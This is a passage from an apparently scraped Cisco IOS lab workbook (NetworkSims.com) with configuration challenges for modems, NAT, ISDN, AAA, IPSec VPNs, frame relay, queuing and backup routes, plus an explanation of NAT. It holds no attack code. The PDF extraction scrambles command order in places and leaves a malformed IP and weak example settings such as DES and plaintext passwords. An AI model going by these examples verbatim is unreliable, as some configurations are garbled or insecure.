Configure line for a modern dial-in modem
NetworkSims.com
87
Host
Devices that expect an incoming modem call
InOut
Configure line for incoming AND outgoing use of modem
Printer
Devices that require DSR/CD active
answer-timeout Set interval between raising DTR and CTS response
dtr-delay
Set interval during which DTR is held low
(config-line)# modem inout
(config-line)# login ?
local
Local password checking
tacacs Use tacacs server for password checking
<cr>
(config-line)# login local
(config-line)# speed ?
<0-4294967295> Transmit and receive speeds
(config-line)# speed 2400
(config-line)# rotary ?
<0-100> Rotary group to add line to
(config-line)# rotary 4
(config-line)# flow ?
NONE
Set no flow control
hardware Set hardware flow control
software Set software flow control
(config-line)# flow none
(config-line)# autoselect ?
arap
Set line to allow ARAP autoselection
during-login Do autoselect at the Username/Password prompt
ppp
Set line to allow PPP autoselection
slip
Set line to allow SLIP autoselection
timeout
Set wait timeout for initial autoselect byte
<cr>
(config-line)# autoselect ppp
(config-line)# stopbits 1.5
(config-line)# modem dialin

Outline
This challenge involves the configuration of a console server.
Objectives
Setup an Async interface.

Define encapsulation.
Define authentication.
Example
NetworkSims.com
88
> en
# config t
(config)# int ?
Async
Async interface
BVI
Bridge-Group Virtual Interface
CTunnel
CTunnel interface
Dialer
Dialer interface
FastEthernet
FastEthernet IEEE 802.3
Group-Async
Async Group interface
Loopback
Loopback interface
MFR
Multilink Frame Relay bundle interface
Multilink
Multilink-group interface
Null
Null interface
Serial
Serial
Tunnel
Tunnel interface
Vif
PGM Multicast Host interface
Virtual
Virtual interface
Virtual-Template
Virtual Template interface
Virtual-TokenRing Virtual TokenRing
range
interface range command
(config)# int async ?
<1-65> Async interface number
(config)# int async 5
atm-dxi
hdlc
lapb
LAPB (X.25 Level 2)
ppp
smds
x25
X.25
(config-if)# ppp authentication ?
chap
pap

Outline
This challenge involves the configuration of a NAT.
Objectives
Enable Nat on the inside and outside.
NetworkSims.com
89
Example
> en
# config t
(config)#ip nat ?
inside
Inside address translation
outside
Outside address translation
pool
Define pool of addresses
service
Special translation for application using non-standard port
translation NAT translation entry configuration
(config)#ip nat inside
destination Destination address translation
source
Source address translation
(config)# ip nat inside ?
destination Destination address translation
source
Source address translation
(config)# ip nat inside source ?
list
Specify access list describing local addresses
route-map Specify route-map
static
Specify static local->global mapping
(config)# ip nat inside source static ?
A.B.C.D Inside local IP address
esp
IPSec-ESP (Tunnel mode) support
network Subnet translation
tcp
udp
(config)# ip nat inside source static 193.84.250.1 ?
A.B.C.D Inside global IP address
(config)# ip nat inside source static 193.84.250.1 195.151.136.5
(config)# int e0
(config-if)# ip nat ?
inside
Inside interface for address translation
outside Outside interface for address translation
(config-if)# ip nat inside
(config-if)# int s0
(config-if)# ip nat outside

Outline
This challenge involves the configuration of ISDN.
Objectives
Define an ACL.
Implement a dialer-list.
Define ISDN parameters.
NetworkSims.com
90
Example
> en
# config t
(config)# access-list 2
(config)# access-list 2 deny host 206.207.17.5
(config)# dialer-list ?
<1-10> Dialer group number
(config)# dialer-list 39 ?
protocol Permit or Deny based on protocols
(config)# dialer-list 39 protocol ?
appletalk
AppleTalk
bridge
Bridging
clns
OSI Connectionless Network Service
clns_es
CLNS End System
clns_is
CLNS Intermediate System
decnet
DECnet
decnet_node
DECnet node
decnet_router-L1 DECnet router L1
hpr
HPR
ip
IP
ipx
Novell IPX
llc2
LLC2
netbios
NETBIOS
vines
Banyan Vines
xns
XNS
(config)# dialer-list 39 protocol ip ?
deny
Deny specified protocol
list
Add access list to dialer list
permit Permit specified protocol
(config)# dialer-list 39 protocol ip permit
(config)# dialer-list 39 protocol ipx permit
(config)# dialer-list 39
protocol Permit or Deny based on protocols
(config)# dialer-list 39 protocol ?
appletalk
AppleTalk
bridge
Bridging
clns
OSI Connectionless Network Service
clns_es
CLNS End System
clns_is
CLNS Intermediate System
decnet
DECnet
decnet_node
DECnet node
hpr
HPR
ip
IP
ipx
Novell IPX
llc2
LLC2
netbios
NETBIOS
vines
Banyan Vines
xns
XNS
(config)# dialer-list 39 protocol ip
deny
Deny specified protocol
list
Add access list to dialer list
permit Permit specified protocol
(config)# dialer-list 39 protocol ip list
<1-199>
IP access list
<1300-2699> IP expanded access list
NetworkSims.com
91
(config)# dialer-list
(config)# isdn ?
T310cisco-action
T310cisco-timeout
leased-line
39 protocol ip list 2
Specify what action to take when T310cisco expires

Specify ISDN VoIP timeout in milliseconds
Sets a BRI interface to support leased lines on B & D
channels
switch-type
Select the ISDN switch type
tei-negotiation
Set when ISDN TEI negotiation should occur (global)
voice-call-failure Specify what cause code to emit when a voice call fails
with no specific cause code
(config)# isdn switch-type ?
basic-1tr6
1TR6 switch type for Germany
basic-5ess
Lucent 5ESS switch type for the U.S.
basic-dms100 Northern Telecom DMS-100 switch type for the U.S.
basic-net3
NET3 switch type for UK, Europe, Asia and Australia
basic-ni
National ISDN switch type for the U.S.
basic-qsig
QSIG switch type
basic-ts013
TS013 switch type for Australia (obsolete)
ntt
NTT switch type for Japan
vn3
VN3 and VN4 switch types for France
<cr>
(config)# isdn switch-type basic-dms100
(config)# int bri0
(config-if)# isdn ?
answer1
Specify Called Party number and subaddress
answer2
Specify Called Party number and subaddress
autodetect
Enable the automatic spid detection
caller
Specify incoming telephone number to be verified
calling-number
Specify Calling Number included for outgoing calls
conference-code
Specify a Conference Code
disconnect-cause
Specify cause code to return in call rejection to the
switch
fast-rollover-delay Delay between fastrollover dials
incoming-voice
Specify options for incoming calls.
map
Specify E.164 address to numbering plan/type mapping
not-end-to-end
Specify speed when calls received are not isdn end to
end
outgoing-voice
Specify information transfer capability for voice calls
overlap-receiving
Specify if the interface will do Overlap Receiving
send-alerting
Specify if Alerting message to be sent out before
Connect message
sending-complete
Specify if Sending Complete included in outgoing SETUP
message
spid1
Specify Service Profile IDentifier
spid2
Specify Service Profile IDentifier
static-tei
Specify a Static TEI for ISDN BRI
(config-if)# isdn spid1 ?
WORD spid1 string
(config-if)# isdn spid1 512790203500
(config-if)# isdn spid2 532790203500
atm-dxi
hdlc
lapb
LAPB (X.25 Level 2)
ppp
smds
x25
X.25
(config-if)# ppp ?
bridge
chap
NetworkSims.com
92
ipcp
lcp
link
max-bad-auth
multilink
pap
quality
reliable-link
timeout
use-tacacs
(config-if)# dialer ?
callback-secure
Enable callback security
enable-timeout
Set length of time an interface stays down before it
is available for dialing
fast-idle
Set idle time before disconnecting line with an
unusually high level of contention
hold-queue
Configure output hold queue
idle-timeout
Specify idle timeout before disconnecting line
load-threshold
Specify threshold for placing additional calls
map
Define multiple dial-on-demand numbers
pool-member
Specify dialer pool membership
priority
Specify priority for use in dialer group
redial
Configure redial for this interface
rotary-group
Add to a dialer rotary group
snapshot
Enable snapshot address for dialer profile
string
Specify telephone number to be passed to DCE device
vpdn
Enable vpdn dial
wait-for-carrier-time How long the router will wait for carrier
watch-disable
Time to wait before bringing down watched route link
watch-group
Assign interface to dialer-watch-list
(config-if)# dialer fast-idle 30
(config-if)# dialer-group 39

Outline
This challenge involves the configuration of AAA on the device.
Objectives
Define E0 settings.
Enable AAA.
Define AAA authentication.
Example
> en
NetworkSims.com
93
# config t
(config)# aaa
(config)# aaa
(config)# aaa
(config)# aaa
(config)# aaa
(config)# aaa
(config)# aaa
new-model
authen loging def local
authen ppp def none
authen banner new york
authen fail personal device
author network default none
author exec default none

Outline
This challenge involves the configuration of a local AAA.
Objectives
Setup AAA parameters for local users.
Example
> en
# config t
(config)# aaa authorization command 1 test local
(config)# aaa authorization network 1 test local
(config)# aaa authentication login default local-case
(config-line)# login authentication default
(config-line)# line aux 0
(config-line)# exit
(config)# username ben password fries
(config)# username ben password yellow

Outline
NetworkSims.com
94
This challenge involves the configuration of AAA applied to an ISDN connection.
Objectives
Setup local AAA.

Apply AAA onto an ISDN connection.
Example
> en
# config t
(config)# aaa authorization command 1 test local
(config)# aaa authorization network 1 test local
(config)# aaa authentication login munich local
(config)# username ann password doghouse
(config)# username daniel password bravo
(config)# int bri0
(config-if)# ppp authentication chap munich

Outline
This challenge involves setting up a VPN.
Objectives
Enable IPSec.
Define an IKE policy.
Define the encryption for IKE.
Define the authentication protocol for IKE.
Define the authentication type.
Define the Diffie-Hellman method.
For pre-share, define the identity.
For pre-share, define the key and the address.
For pre-share, define the transform set.
NetworkSims.com
95
Example
> en
# config t
(config)# crypto
(config)# crypto
(config-isakmp)#
(config-isakmp)#
(config-isakmp)#
(config-isakmp)#
(config-isakmp)#
(config-isakmp)#
(config)# crypto
(config)# crypto
(config)# crypto
isakmp enable
isakmp policy 111
encryption des
hash sha
authentication pre-share
lifetime 10500
group 1
exit
isakmp identity hostname
isakmp key test address 192.168.1.1
ipsec transform-set finland esp-des

Outline
This challenge involves setting up a crypto map and applying it to an interface.
Objectives
Define a Crypto access-list, to identity the traffic to encrypt.

Define IKE.
Define a crypto map.
Bind the ACL with the crypto map.
Apply crypto map to E0.
Example
> en
# config t
(config)# hostname newhampshire
(config)# access-list 109 permit ip 50.93.142.0 0.0.255.255
136.163.130.0 0.0.255.255
NetworkSims.com
96
(config)# crypto isakmp enable

(config)# crypto isakmp policy 111
(config-isakmp)# encryption des
(config-isakmp)# hash sha
(config-isakmp)# authentication pre-share
(config-isakmp)# lifetime 10500
(config-isakmp)# group 1
(config-isakmp)# exit
(config)# crypto isakmp identity hostname
(config)# crypto isakmp key test address 192.168.1.1
(config)# crypto ipsec transform-set finland esp-des
(config)# crypto map manchester 10 ipsec-isakmp
(config-cryto-map)# match address 109
(config-cryto-map)# set peer 192.168.1.1
(config-cryto-map)# set transform-set finland
(config-cryto-map)# set pfs group1
(config-cryto-map)# exit
(config)# int e0
(config-if)# crypto map manchester

Outline
This challenge involves setting an access-list to allow IPSec.
Objectives
Create and access-list which allows AHP, ESP and ISAKMP.

Applies the access-list.
Example
> en
# config t
(config)# hostname london
NetworkSims.com
97
london (config)# access-list 101 permit ahp host 117.84.81.2 host

61.222.47.2
london (config)# access-list 101 permit esp host 117.84.81.2 host
61.222.47.2
london (config)# access-list 101 permit udp host 117.84.81.2 host
61.222.47.2 eq isakmp
london
london
london
london
(config)# int e0

Outline
This challenge involves setting of CA.
Objectives
Generate a public and private key.

Define CA.
Example
> en
# config t
(config)# ip domain-name test.com
london (config)# crypto key generate rsa
london (config)# crypto ca identity idaho
(ca-identity)# ?
Syntax: enrollment url [url]
Syntax: enrollment mode ra
Syntax: crl option
Syntax: query [url]
london (ca-identity)# enrollment url http://helpcert
NetworkSims.com
98
london (ca-identity)# crl optional

london (ca-identity)# exit
(config)# crypto ca authenticate idaho
(config)# crypto ca enroll idaho

Outline
This challenge involves the configuration of frame relay.
Objectives
Define frame-relay encapsulation.
Example
> en
# config t
(config)# int s0
atm-dxi
hdlc
lapb
LAPB (X.25 Level 2)
ppp
smds
x25
X.25
(config-if)# encapsulation frame-relay
(config-if)# frame-relay ?
broadcast-queue
Define a broadcast queue and transmit rate
class
Define a map class on the interface
de-group
Associate a DE group with a DLCI
interface-dlci
Define a DLCI on an interface/subinterface
intf-type
Configure a FR DTE/DCE/NNI interface
inverse-arp
Enable/disable inverse ARP on a DLCI
ip
Frame Relay Internet Protocol config commands
lapf
set LAPF parameter
lmi-n391dte
set full status polling counter
lmi-n392dce
LMI error threshold
lmi-n392dte
LMI error threshold
NetworkSims.com
99
lmi-n393dce
lmi-n393dte
lmi-t392dce
lmi-type
local-dlci
map
multicast-dlci
priority-dlci-group
qos-autosense
route
svc
traffic-shaping
traps-maximum
set LMI monitored event count

set DCE polling verification timer
Use CISCO-ANSI-CCITT type LMI
Set source DLCI when LMI is not supported
Map a protocol address to a DLCI address
Set DLCI of a multicast group
Define a priority group of DLCIs
enable QOS autosense
frame relay route for pvc switching
Enable frame relay SVCs
Enable Frame Relay Traffic Shaping
set max traps FR generates at link up or when getting
LMI Full Status message
(config-if)# frame-relay map ?
bridge Bridging
ip
IP
ipx
Novell IPX
llc2
llc2
(config-if)# frame-relay map ip ?
A.B.C.D Protocol specific address
(config-if)# frame-relay map ip 196.85.163.14 ?
<16-1007> DLCI
(config-if)# frame-relay map ip 196.85.163.14 102 ?
broadcast
Broadcasts should be forwarded to this address
cisco
Use CISCO Encapsulation
compress
Enable TCP/IP and RTP/IP header compression
ietf
Use RFC1490/RFC2427 Encapsulation
nocompress
Do not compress TCP/IP headers
payload-compression Use payload compression
rtp
RTP header compression parameters
tcp
<cr>
(config-if)# frame-relay map ip 196.85.163.14 102 broadcast
authentication
authentication-key
cost
Interface cost
database-filter
dead-interval
demand-circuit
OSPF demand circuit
hello-interval
message-digest-key
mtu-ignore
network
Network type
priority
Router priority
advertisements
transmit-delay
(config-if)# ip ospf network ?
broadcast
Specify OSPF broadcast multi-access network
non-broadcast
Specify OSPF NBMA network
point-to-multipoint Specify OSPF point-to-multipoint network
point-to-point
Specify OSPF point-to-point network
(config-if)# ip ospf network point-to-multipoint

NetworkSims.com
100
Outline
This challenge involves the configuration of frame relay.
Objectives
Define frame relay.

Define encapsulation for frame-relay.
Define a mapping.
Define an LMI type.
Example
> en
# config t
(config)# int s0
atm-dxi
hdlc
lapb
LAPB (X.25 Level 2)
ppp
smds
x25
X.25
<16-1007> DLCI
(config-if)# frame-relay map ip 62.250.1.12 102
broadcast
cisco
compress
ietf
nocompress
rtp
tcp
<cr>
(config-if)# frame-relay map ip 62.250.1.15. 103 broadcast
broadcast-queue
class
de-group
interface-dlci
intf-type
NetworkSims.com
101
inverse-arp
ip
lapf
lmi-n391dte
lmi-n392dce
lmi-n392dte
lmi-n393dce
lmi-n393dte
lmi-t392dce
lmi-type
local-dlci
map
multicast-dlci
priority-dlci-group
qos-autosense
route
svc
traffic-shaping
traps-maximum

set LAPF parameter
LMI error threshold
LMI error threshold
Enable frame relay SVCs
(config-if)# frame-relay lmi-type ?
cisco
ansi
q933a
(config-if)# frame-relay lmi-type ansi
Ref
http://www.cisco.com/univercd/cc/td/doc/product/software/ios121/121cgcr/wan_c/wcdfrely.
htm

Outline
This challenge involves the configuration of frame relay for traffic shaping.
Objectives
Define a map class.

Define traffic rates.
Define adaptive shaping.
Define a priority-group.
NetworkSims.com
102
Apply map class to an interface.
Example
> en
# config t
(config)# map-class frame kirkcaldy
(config-map-class)# frame-relay traffic ?
<600-45000000> Committed Information Rate (CIR)
(config-map-class)# frame-relay traffic 9600 ?
<0-45000000> Peak rate (CIR + EIR)
<cr>
(config-map-class)# frame-relay traffic 9600 18000
(config-map-class)# frame-relay adaptive-shaping ?
becn
Enable rate adjustment in response to BECN
foresight Enable rate adjustment in response to ForeSight messages and BECN
(config-map-class)# frame-relay adaptive-shaping becn
(config-map-class)# frame-relay priority-group 3
(config-map-class)# exit
(config)# int s0
(config-if)# frame-relay traffic-shaping
(config-if)# frame-relay class kirkcaldy
Explanation
Traffic shaping controls the traffic going out of an interface, and should match the flow of
traffic to the required rate at which the remote device wishes to receive the data. The
commands used include:
frame-relay adaptive-shaping [becn | foresight]1
Select either BECN or ForeSight as the congestion backward-notification mechanism to

which traffic shaping will adapt.
frame-relay traffic-shaping
Enable Frame Relay traffic shaping and per-VC queueing.

frame-relay traffic-rate average [peak]
Define the traffic rate for the map class.

frame-relay priority-group list-number
Specify a priority queue list.

map-class frame-relay map-class-name
Specify a map class to define.
NetworkSims.com
103
Ref:
http://www.cisco.com/univercd/cc/td/doc/product/software/ios120/12cgcr/qos_c/qcpart4/qcf
rts.htm

Outline
This challenge involves the configuration of frame relay for traffic shaping for queuing.
Objectives
Define a map class.

Define traffic rates.
Define adaptiveshaping.
Define a priority-group.
Apply map class to an interface.
Example
# config t
(config)# map-class frame-relay ion
(config)# priority-list 37 protocol ip normal
(config)# priority-list 37 default ?
high
medium
normal
low
(config)# priority-list 37 default medium
(config)# int s0
Explanation
NetworkSims.com
104
With priority queing the traffic is prioritized using a priority-list, and the priority-group
command within the class-map defines which priority-list to use. These queues are: high,
medium, normal, or low priority. Thus, the router searches in the high queue first, and
transmit these packets before the other queues, and so on. Thus the high priority traffic is
defined as traffic which must go, no matter what, while other traffic can be dropped.
To configure priority the following protocol is used:
priority-list list-number protocol protocol-name {high | medium | normal |
low} queue-keyword keyword-value
where
Protocol classifies the traffic. It is typically IP, but can be IPX, AppleTalk, and so on.
List-number defines that all statements use the same policy, and can range from 1 to 16.
Queue-keyword can be one of: fragments, gt, lt, list, tcp, and udp.
Keyword-value specifies the port for TCP or UDP.
The default queue for all other traffic can then be specified with:
priority-list list-number default {high | medium | normal | low}
Ref
http://www.cisco.com/en/US/products/sw/iosswrel/ps1835/products_configuration_guide_c
hapter09186a00800b75b0.html

Outline
This challenge involves the configuration of frame relay for priority queuing.
Objectives
Define an access-list to define the traffic for queuing.

Define a map class.
NetworkSims.com
105
Define a queue list.
Example
# config t
> en
# config t
(config)# access-list 100 permit tcp 215.78.24.0 255.255.0.0 97.49.56.0
255.255.0.0 eq smtp
(config)# map-class frame-relay ion
(config)# queue-list ?
<1-16> Queue list number
(config)# queue-list 13 ?
default
Set custom queue for unspecified datagrams
interface
Establish priorities for packets from a named interface
lowest-custom Set lowest number of queue to be treated as custom
protocol
priority queueing by protocol
queue
Configure parameters for a particular queue
stun
Establish priorities for stun packets
(config)# queue-list 13 protocol ?
arp
IP ARP
bridge
Bridging
cdp
Cisco Discovery Protocol
compressedtcp Compressed TCP
ip
IP
ipx
Novell IPX
llc2
llc2
pad
PAD links
snapshot
Snapshot routing support
(config)# queue-list 13 protocol ip ?
<0-16> queue number
(config)# queue-list 13 protocol ip 1 ?
fragments Prioritize fragmented IP packets
gt
Classify packets greater than a specified size
list
To specify an access list
lt
Classify packets less than a specified size
tcp
Prioritize TCP packets 'to' or 'from' the specified port
udp
Prioritize UDP packets 'to' or 'from' the specified port
<cr>
(config)# queue-list 13 protocol ip 1 list ?
<1-199>
IP access list
(config)# queue-list 13 protocol ip 1 list 100
(config)# queue-list 13 queue 1 byte-count 1000 limit 2
(config)# queue-list 13 queue 2 byte-count 700 limit 20
(config)# queue-list 13 default 2
(config)# int s0
NetworkSims.com
106
Explanation
This example uses two queues, which are identified by an ACL (in this case they are the
same, but normally they would have different ACLs). For example the first queue is
matched to the ACL with a number of 100:
queue-list 13 protocol ip 1 list 100
The following command defines that queue 1 has a byte-count limit of 1000 bytes and that
there is a maximum of two packets in the queue:
queue-list 13 queue 1 byte-count 1000 limit 2
Ref:
http://www.cisco.com/en/US/products/hw/switches/ps1893/products_command_reference_
chapter09186a008007dec9.html

Outline
This challenge involves the configuration of backup routes.
Objectives
Define a backup interface.

Define the backup timings.
Example
> en
# config t
(config)# int s0
(config-if)# backup ?
delay
Delays before backup line up or down transitions
interface Configure an interface as a backup
NetworkSims.com
107
load
Load thresholds for line up or down transitions
(config-if)# backup interface ?
Async
Async interface
BRI
ISDN Basic Rate Interface
BVI
Dialer
Dialer interface
FastEthernet
Group-Async
Lex
Lex interface
Loopback
Loopback interface
Multilink
Null
Null interface
Serial
Serial
Tunnel
Tunnel interface
Virtual-Template
Vlan
Catalyst Vlans
(config-if)# backup interface bri0
(config-if)# backup delay ?
<0-4294967294> Seconds
never
Never activate the backup line
(config-if)# backup delay 52 ?
<0-4294967294> Seconds
never
Never deactivate the backup line
(config-if)# backup delay 52 83
(config-if)# backup load 86 68
Remember to check that the BRI0 interface is now a backup, such as:
# sh interface bri0
BRI0 is standby mode, line protocol is down
Hardware is PQUICC BRI with U interface
MTU 1500 bytes, BW 64 Kbit, DLY 20000 usec,
reliability 255/255, txload 1/255, rxload 1/255
Encapsulation HDLC, loopback not set
Last input never, output never, output hang never
Last clearing of "show interface" counters never
Input queue: 0/75/0/0 (size/max/drops/flushes); Total output drops: 0
Queueing strategy: weighted fair
Output queue: 0/1000/64/0 (size/max total/threshold/drops)
Conversations 0/0/16 (active/max active/max total)
Reserved Conversations 0/0 (allocated/max allocated)
5 minute input rate 0 bits/sec, 0 packets/sec
5 minute output rate 0 bits/sec, 0 packets/sec
0 packets input, 0 bytes, 0 no buffer
Received 0 broadcasts, 0 runts, 0 giants, 0 throttles
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
0 packets output, 0 bytes, 0 underruns
0 output errors, 0 collisions, 0 interface resets
0 output buffer failures, 0 output buffers swapped out
0 carrier transitions
Explanation
NetworkSims.com
108
A backup route is important to provide resiliance. The following defines that the BRI0
interface will be the backup route:
backup interface bri0
Then to activate the backup after 52 seconds of the primary line being in active, and for the
secondary to backup after 83 seconds of the primary line being re-activated, the following
command is used:
backup delay 52 83
When loading is used, the following defines that the backup route becomes active when at
86% of the full load, and deactives at 68% of full load:
backup load 86 68
Ref:
http://www.cisco.com/en/US/products/sw/iosswrel/ps1828/products_command_reference_c
hapter09186a00800ca527.html

Outline
This challenge involves the configuration of Weighted Fair Queues.
Objectives
Define a frame-relay encapsulation

Define congestion discard threshold.
Define bandwidth on interface.
Example
> en
# config t
(config)# int s0
(config-if)# fair-queue 128
(config-if)# exit
NetworkSims.com
109
(config)# exit
Remember to check that queueing is applied:

# sh int s0
Serial0 is down, line protocol is down
Hardware is PowerQUICC Serial
Internet address is /0
MTU 1500 bytes, BW 100 Kbit, DLY 20000 usec,
reliability 128/255, txload 1/255, rxload 1/255
Encapsulation frame-relay, loopback not set
Keepalive set (10 sec)
Last input 03:56:59, output 00:00:06, output hang never
Last clearing of "show interface" counters 6d07h
Input queue: 0/75/0/0 (size/max/drops/flushes); Total output drops: 0
Queueing strategy: weighted fair
Output queue: 0/1000/64/0 (size/max total/threshold/drops)
Conversations 0/2/256 (active/max active/max total)
Reserved Conversations 0/0 (allocated/max allocated)
5 minute input rate 0 bits/sec, 0 packets/sec
5 minute output rate 0 bits/sec, 0 packets/sec
Received 61877 broadcasts, 0 runts, 535 giants, 0 throttles
2571 input errors, 138 CRC, 1456 frame, 0 overrun, 0 ignored, 743
abort
0 output buffer failures, 0 output buffers swapped out
952 carrier transitions
DCD=up DSR=up DTR=up RTS=up CTS=up
Ref:
http://www.opalsoft.net/qos/WhyQos-2424.htm

Outline
This challenge involves the configuration of CBWFQ.
Objectives
Define CBWFQ.
Example
NetworkSims.com
110
> en
# config t
(config)# access-list 108 permit ip 162.78.102.0 0.0.255.255 247.226.90.0
0.0.255.255
(config)# class-map tayside
(config-cmap)# match access-group 108
(config-cmap)# exit
(config)# policy-map ankle
(config-pmap)# class tayside
(config-pmap-c)# bandwidth 128
(config-pmap-c)# queue-limit 21
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int s0
(config-if)# service-policy output ankle
Explanation
The following shows an example of limiting all the traffic which fits access-list 111 to
2Mbps:
Class
map
Identify traffic
characteristic
Policy
map
Service
policy
Define the
policy for the
traffic
Apply the
policy to
an interface
# policy-map pmap
(config-pmap)# class cmap
# class-map cmap
# int s0
(config-if)# service-policy output pmap
Limit traffic which fits access-list 111 to 2Mbps
Ref:
http://www.netcraftsmen.net/welcher/papers/newqos121.html
NetworkSims.com
111

Outline
This challenge involves the configuration of dynamic NAT.
Objectives
Define a dynamic NAT pool.

Define an access-list to identify the traffic to be translated.
Apply NAT on E0 and S0 interfaces.
Example
> en
# config t
(config)# ip nat pool mynatpool 150.122.41.150 150.122.41.99
255.255.255.0
(config)# ip nat inside source list 7 pool mynatpool
(config)# int e0
(config-if)# int s0
netmask

Outline
This challenge involves the configuration of dynamic NAT.
Objectives
Define three static NAT mappings.

Example
NetworkSims.com
112
> en
# config t
(config)# int e0
(config-if)# int s0
Explanation
In this case the lines:
defines that a host with the address of 160.94.210.50 will be viewed from the outside of the
network as 93.123.33.13. Thus, for example, if the host at 160.94.210.50 is a Web server, users
from outside the network will access it using the address of 93.123.33.13. Normally servers
which have public access have a static mappings as this allows them to be accessed through
the static mapping.
Theory
Network address translation (NAT) is defined in RFC1631, and swaps one network address
with another. This allows private networks (RFC1918) to be created, which are then
translated to public address when they access the Internet. A router can operate at the
border of a domain and translate addresses from private to public, and vice-versa. For
example, a node could be given a private address of 192.168.10.12. The NAT could then
translate this to a public address of 168.10.34.31. The NAT table would then have the
mapping of:
Private
192.168.10.12
Public
168.10.34.21
If a host from outside the domain sends a data packet back to the domain, the NAT will
translate the public address back into the private address. These translations can be
statically assigned, such as where it is setup with a permanent mapping, or dynamically,
where the tables can change as the network requires. Figure 1 gives an example, where the
destination address is 11.22.33.44. The address in this case is changed from 192.168.10.12 to
168.10.34.21, as the data packet goes out of the domain, and is changed back when it comes
back into the domain.
NetworkSims.com
113
PAT (Port address translation)

NAT routers can use port address translation (PAT), which allows many internal address to
be mapped to the same global address. This is also named as a many-to-one NAT, or address
overloading. With PAT, the NAT router keeps a track of the connections, and the TCP/UDP
ports that are being used. The NAT router then changes the global address back into a
private address based on these. In Figure 2 there is a single external address (168.10.34.21),
but multiple source ports are used to identify the connection. It can be seen in the example
in Figure 3 that a host has four different connections with a WWW server, and each of the
connections have been mapped to a unique source port (5555, 5556, 5557 and 5558).
IP
IP Src:
Src: 192.168.10.12
192.168.10.12
IP
IP Dest:
Dest: 11.22.33.44
11.22.33.44
Outgoing
Outgoingdata
data
IP
IP Src:
Src: 168.10.34.21
168.10.34.21
IP
Dest:
IP Dest: 11.22.33.44
11.22.33.44
Outgoing
Outgoingdata
data
NAT
NAT
Router
Router
IP
IP Src:
Src: 11.22.33.44
11.22.33.44
IP
Dest:
IP Dest: 192.168.10.12
192.168.10.12
IP
IP Src:
Src: 11.22.33.44
11.22.33.44
IP
IP Dest:
Dest: 168.10.34.21
168.10.34.21
Incoming
Incomingdata
data
Incoming
Incomingdata
data
Figure 1
Example of NAT
In summary the advantages of NAT are:
Hides the network addresses of the network.

Bars direct contact with a host.
Increased range of address.
Allow easy creation of subnetworks.
NetworkSims.com
114
Src:
Src: 192.168.10.12:4444
192.168.10.12:4444
Dest:
Dest: 11.22.33.44:80
11.22.33.44:80
Outgoing
Outgoingdata
data
Src:
Src: 168.10.34.21:5555
168.10.34.21:5555
Dest:
Dest: 11.22.33.44:80
11.22.33.44:80
Outgoing
Outgoingdata
data
N
Src:
Src: 11.22.33.44:80
11.22.33.44:80
Dest:
Dest: 192.168.10.12:4444
192.168.10.12:4444
Src:
Src: 11.22.33.44:80
11.22.33.44:80
Dest:
Dest: 168.10.34.21:5555
168.10.34.21:5555
Incoming
Incomingdata
data
Incoming
Incomingdata
data
PAT (Port address translation) Maps many addresses to one global address.
Figure 2
Example of port address translation (PAT)

Src:
Src: 192.168.10.12:4444
192.168.10.12:4444
Dest:
Dest: 11.22.33.44:80
11.22.33.44:80
Outgoing
Outgoingdata
data
Src:
Src: 168.10.34.21:5555
168.10.34.21:5555
Dest:
Dest: 11.22.33.44:80
11.22.33.44:80
Outgoing
Outgoingdata
data
N
Src:
Src: 11.22.33.44:80
11.22.33.44:80
Dest:
Dest: 192.168.10.12:4444
192.168.10.12:4444
Src:
Src: 11.22.33.44:80
11.22.33.44:80
Dest:
Dest: 168.10.34.21:5555
168.10.34.21:5555
Incoming
Incomingdata
data
Incoming
Incomingdata
data
IP:port (inside)
192.168.10.12:4444
192.168.10.12:4445
192.168.10.12:4446
192.168.10.20:1234
Figure 3
IP:port (outside)
168.10.34.21:5555
168.10.34.21:5556
168.10.34.21:5557
168.10.34.21:5558
Ipdest:port
11.122.33.44:80
11.122.33.44:80
11.122.33.44:80
11.122.33.44:80
New connects in the table
Example of port address translation (PAT)
NAT types
The three main types of NAT are:
w1.x1.y1.z1
a1.b1.c1.d1
Static translation. Each public IP

address translates to a private
through a static table. It is good
security/ logging/ traceabilty, but
NetworkSims.com
N
a2.b2.c2.d2
Private
address
w2.x2.y2.z2
Public
address
one
for
does
115
not hide the internal network. As the network addresses are statically defined, the nodes
inside the network can be contacted directly from outside. Static translation also does
not save in network addresses, although an organisation may limit access by limiting the
number of private addresses which are available.
IP
Masquerading
(Dynamic
w.x.y.z
a1.b1.c1.d1
Translation). A single public IP address
is
used for the whole network. The table is
thus dynamic, and uses TCP ports to
N
identify
connections. It has the
w.x.y.z
a2.b2.c2.d2
advantage that a complete network
Private
Public
requires only a single public address,
address
address
but, of course, the network which is
allocted with private addresses is dependent upon the NAT device for its connection to
external networks.
Load Balancing Translation. With this, a request is made to a resource, such as to a
WWW server, the NAT device then looks at the current loading of the systems, and
forwards the request to the one which is most lightly used (Figure 4).
NAT device selects the
least used resource
a1.b1.c1.d1
Or
a1.b1.c1.d1
Or
an.bn.cn.dn
w.x.y.z
Private
address
a1.b1.c1.d1
a1.b1.c1.d1
Public
address
an.bn.cn.dn
Server pool
Figure 4
Load balancing translation
NAT backtracking
Dynamic NAT is good at isolating the external network from a pubic untrusted network, as
it allows the NAT device to create a table of connections which have been initiated from
inside. Thus external devices cannot contact hosts as they cannot be mapped into in the
NAT device. Unfortunately some applications, such as FTP and IRC, require a server
connection to be setup on the host. Thus the NAT device must be able to implement
backtracking of connections, as illustrated in Figure 5.
NetworkSims.com
116
w1.x1.y1.z1
a1.b1.c1.d1
N
w2.x2.y2.z2
a2.b2.c2.d2
Private
address
Public
address
NAT is good
as we are isolated
from the external
public network, where
our hosts make the
initiate connections
w.x.y.z
a1.b1.c1.d1
but what happens

if we use applications
which create connections
in the reverse direction,
such as with FTP and IRC?
N
a2.b2.c2.d2
Private
address
Public
address
Figure 5
.. we thus need some

form of backtracking of
connections in the NAT device.
NAT backtracking
NAT weaknesses
Static NAT is poor for security, as it does not hide the network. This is because there is a
one-to-one mapping, and external nodes can thus connect to internal devices. It also does
not hide the host from the external network, so that it can be traced, if the mapping table is
known. Dynamic NAT is much better for security, as it hides the network. Unfortunately it
has two major weaknesses:
- Backtracking allows external parties to trace back a connection.
- If the NAT device becomes compromised the external party can redirect traffic.
These weaknesses are illustrated in Figure 5.
Dynamic NAT is good for security,
as it hides the network. Unfortunately it
has two major weaknesses:
Static NAT is poor for security,

as it does not hide the network. This
is because there is a one-to-one
mapping.
- Backtracking allows external parties to

